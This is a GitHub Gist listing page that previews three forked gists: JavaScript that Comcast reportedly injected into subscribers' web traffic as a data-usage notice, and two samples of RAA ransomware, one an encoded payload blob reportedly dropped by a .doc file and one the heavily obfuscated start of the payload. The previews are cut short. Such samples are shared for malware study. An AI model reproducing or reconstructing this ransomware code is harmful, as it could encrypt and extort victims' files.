oumarxy
/ ComcastInject.html
Created
April 12, 2017 14:50
— forked from ryankearney/ComcastInject.html
This is the code Comcast is injecting into its users web traffic.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script language="JavaScript" type="text/javascript"> | |
| // Comcast Cable Communications, LLC Proprietary. Copyright 2012. | |
| // Intended use is to display browser notifications for critical and time sensitive alerts. | |
| var SYS_URL='/e8f6b078-0f35-11de-85c5-efc5ef23aa1f/aupm/notify.do'; | |
| // var image_url='http://servicealerts.comcast.net:8080/images/mt'; | |
| var image_url='http://xfinity.comcast.net/constantguard/BotAssistance/notice/images'; | |
| var headertext1='<strong>Comcast Courtesy Notice</strong>'; | |
| var textline1='You have reached 90% of your <b>monthly data usage allowance</b>.'; | |
| var textline2='Please sign in for more information and to remove this alert.'; | |
| var acknowledgebutton='<a href=\"#\" onClick="document.location.href=\''+SYS_URL+'?dispatch=redirect&redirectName=login¶mName=bmUid\'" title="Sign in to acknowledge" style="color: #FFFFFF;"><img alt="Sign in to acknowledge" src="'+image_url+'/mt_signin.png"/></a>'; |
oumarxy
/ RAA_ransomware_new_variant.js
Created
April 12, 2017 14:33
— forked from Antelox/RAA_ransomware_new_variant.js
New RAA ransomware variant - code dropped by a .doc file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ////1pelDZyydsTIR5Zri3YDm3hG5qDWSU0SMOml2APXT0G3P6AlpXW9crsWOlRhh8YXNSgCuSx1Zjzdgdom63F12MhHMkrdgGrdSupSnzqVGJpa5T1j1PDr4GQ52hbrBXEO2yO5MJw2yKhzKtBRVmH2XgU9eyRAdXfitQ7ClpUDz5c39YmHNDbqp6O5g0LMTlHOoISDSwxqnKSrqctz5QyK0fch83I7kym6PftqKPE2N4rWtIsjjcHQvf1C8CNCshPbHhfJ9yyRulOHyQKRDoGHtGIXhd3pp6x8K6WqADLhjj3E9TMMqEXrKSk2mBjMMyBANayM1frIWms1Hf1vx3noqPOJZ7bEd5MK4mXWrBYWc5ysmR2kzOKZWsBM35h44iAavITskbRgpPbvY8l1dRphJxYznVA8MVhij3dOJX4iFQimEvP0QyIVz4CPy0s2sQtz8sWAeZYsTOaCXwWyM6NrzG7AjDGWBA66WMlNPYbj35kH4nj8z8nKneuDfoHntevO8tebGI3T7uDeFCd3ZtBYOAFKemqomrJJO27ASNPPJIu0Vt4Cb60n4ZjmtwHy0st3X7jyoFqiwOJyhrekX9ooPdt9EiF7rAaZV4BQlhIPUuS4uiKhmzpyZlRUe9gYPBRgyTrgoNvfBJ44ITW8vQaanbri7DEajAmdnul88ghLzB4SNKFqDV1WB67GaIj989QiYcY5VvOchvCJPzZ5IJg5ijouN03foKODTD0nQdfATbxED1QlEpE2V0HwdABJaYkfTtchUEWHR7rmxXUbfEB2ICKY96TK6CbCbeRp4quRaborW9RqOIwDILqUSBHn3AYLX0IbATj415mdqAP21B217Uwq5YkQpEFuZh1kbKrYKNpTgwl30HbI6BAK5EqqHZBBdrEaLSfSGEDIYfxTqW8fmA7XtHjusZsPgM7TDcd4ghr7vEs6cqYAiV7cKSGTyuBTKJZXiOEAhq0ogNDsfoL0QeMCtqrBOoqoe1beFZ8z7cG8pDGpcfAmj64UNzXk |
oumarxy
/ RAA.js
Created
April 12, 2017 14:32
— forked from Antelox/RAA.js
RAA ransomware - Now payload code heavily obfuscated
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _0xc751 = ["length", "digits", "boolean", "slice", "isNeg", "charAt", "-", "0", "substr", "abs", "", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "min", "charCodeAt", "max", "fromCharCode", " ", "join", "floor", "ceil", "modulus", "mu", "bkplus1", "modulo", "multiplyMod", "powMod", "NoPadding", "PKCS1Padding", "RawEncoding", "NumericEncoding", "number", "chunkSize", "radix", "barrett", "string", "random", "split", "substring", "lib", "Base", "prototype", "mixIn", "init", "hasOwnProperty", "apply", "$super", "extend", "toString", "WordArray", "words", "sigBytes", "stringify", "clamp", "push", "call", "clone", "enc", "Hex", "Latin1", "Utf8", "Malformed UTF-8 data", "parse", "BufferedBlockAlgorithm", "_data", "_nDataBytes", "concat", "blockSize", "_minBufferSize", "splice", "Hasher", "cfg", "reset", "finalize", "HMAC", "algo", "Base64", "_map", "indexOf", "create", "ABCDEFGHIJKLMN |